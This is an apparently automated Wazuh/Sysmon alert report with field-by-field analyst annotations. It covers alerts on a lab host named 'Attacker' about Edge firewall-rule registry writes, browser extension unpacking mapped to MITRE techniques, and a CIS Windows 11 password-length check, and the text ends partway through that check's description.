data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:41:13.6190305Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  225972
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:41:13.600 ProcessGuid: {94294ddc-50b9-6804-bf08-000000000e00} ProcessId: 10860 Image: C:\WINDOWS\SystemTemp\chrome_Unpacker_BeginUnzipping12284_132767381\CR_72F4F.tmp\setup.exe TargetFilename: C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk CreationUtcTime: 2025-04-12 15:52:55.107 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:41:13.600
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-50b9-6804-bf08-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10860
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_132767381\\CR_72F4F.tmp\\setup.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-12 15:52:55.107
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{F4DF00BD-4AEA-44E9-91CE-FDCCFF1F019F} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe|Name=025e84dc-434c-4cde-a1c0-1932db2c81a4|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge|

🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{F4DF00BD-4AEA-44E9-91CE-FDCCFF1F019F} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe|Name=025e84dc-434c-4cde-a1c0-1932db2c81a4|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge|

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:34:27.311+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:27.311+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{F4DF00BD-4AEA-44E9-91CE-FDCCFF1F019F} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe|Name=025e84dc-434c-4cde-a1c0-1932db2c81a4|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge|
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92307
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid13_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534067.616369
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  13
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  13
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:41:49.4998048Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  227426
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Registry value set: RuleName: - EventType: SetValue UtcTime: 2025-04-20 01:41:49.499 ProcessGuid: {94294ddc-ea86-67fe-3b00-000000000e00} ProcessId: 2892 Image: C:\WINDOWS\system32\svchost.exe TargetObject: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{F4DF00BD-4AEA-44E9-91CE-FDCCFF1F019F} Details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe|Name=025e84dc-434c-4cde-a1c0-1932db2c81a4|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge| User: NT AUTHORITY\LOCAL SERVICE"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.eventType:  SetValue
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:41:49.499
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-ea86-67fe-3b00-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetObject:  HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{F4DF00BD-4AEA-44E9-91CE-FDCCFF1F019F}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.details:  v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe|Name=025e84dc-434c-4cde-a1c0-1932db2c81a4|Desc=Inbound rule for Microsoft Edge to allow mDNS traffic.|EmbedCtxt=Microsoft Edge|
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\LOCAL SERVICE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:34:28.508+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:28.508+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534068.620707
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:42:01.5524130Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  228128
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:42:01.551 ProcessGuid: {94294ddc-50a4-6804-a108-000000000e00} ProcessId: 11932 Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\chrome_Unpacker_BeginUnzipping11932_114863717\manifest.json CreationUtcTime: 2025-04-20 01:42:01.551 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:42:01.551
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-50a4-6804-a108-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\chrome_Unpacker_BeginUnzipping11932_114863717\\manifest.json
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:42:01.551
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  15
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:34:28.508+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:28.508+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534068.623580
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:42:01.5530634Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  228129
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:42:01.551 ProcessGuid: {94294ddc-50a4-6804-a108-000000000e00} ProcessId: 11932 Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\chrome_Unpacker_BeginUnzipping11932_114863717\sets.json CreationUtcTime: 2025-04-20 01:42:01.551 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:42:01.551
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-50a4-6804-a108-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\chrome_Unpacker_BeginUnzipping11932_114863717\\sets.json
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:42:01.551
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  15
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:34:28.540+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:28.540+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534068.626437
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:42:01.5553469Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  228131
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:42:01.553 ProcessGuid: {94294ddc-50a4-6804-a108-000000000e00} ProcessId: 11932 Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\chrome_Unpacker_BeginUnzipping11932_114863717\_metadata\verified_contents.json CreationUtcTime: 2025-04-20 01:42:01.553 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:42:01.553
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-50a4-6804-a108-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\chrome_Unpacker_BeginUnzipping11932_114863717\\_metadata\\verified_contents.json
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:42:01.553
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from failed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from failed to 'not applicable'

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:34:31.951+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:31.951+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from failed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19013
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['1.1.4']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['5.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534071.629391
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26003
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Minimum password length' is set to '14 or more character(s)'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting determines the least number of characters that make up a password for a user account. There are many different theories about how to determine the best password length for an organization, but perhaps 'passphrase' is a better term than 'password.' In Microsoft Windows 2000 and newer, passphrases can be quite long and can include spaces. Therefore, a phrase such as 'I want to drink a $5 milkshake' is a valid passphrase; it is a considerably stronger password than an 8 or 10 character string of random numbers and letters, and yet is easier to remember. Users must be educated about the proper selection and maintenance of passwords, especially with regard to password length. In enterprise environments, the ideal value for the Minimum password length setting is 14 characters, however you should adjust this value to meet your organization's business requirements. The recommended state for this setting is: 14 or more character(s). Note: In Windows Server 2016 and older versions of Windows Server, the GUI of the Local Security Policy (LSP), Local Group Policy Editor (LGPE) and Group Policy Management Editor (GPME) would not let you set this value higher than 14 characters. However, starting with Windows Server 2019, Microsoft changed the GUI to allow up to a 20 character minimum password length. Note #2: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group 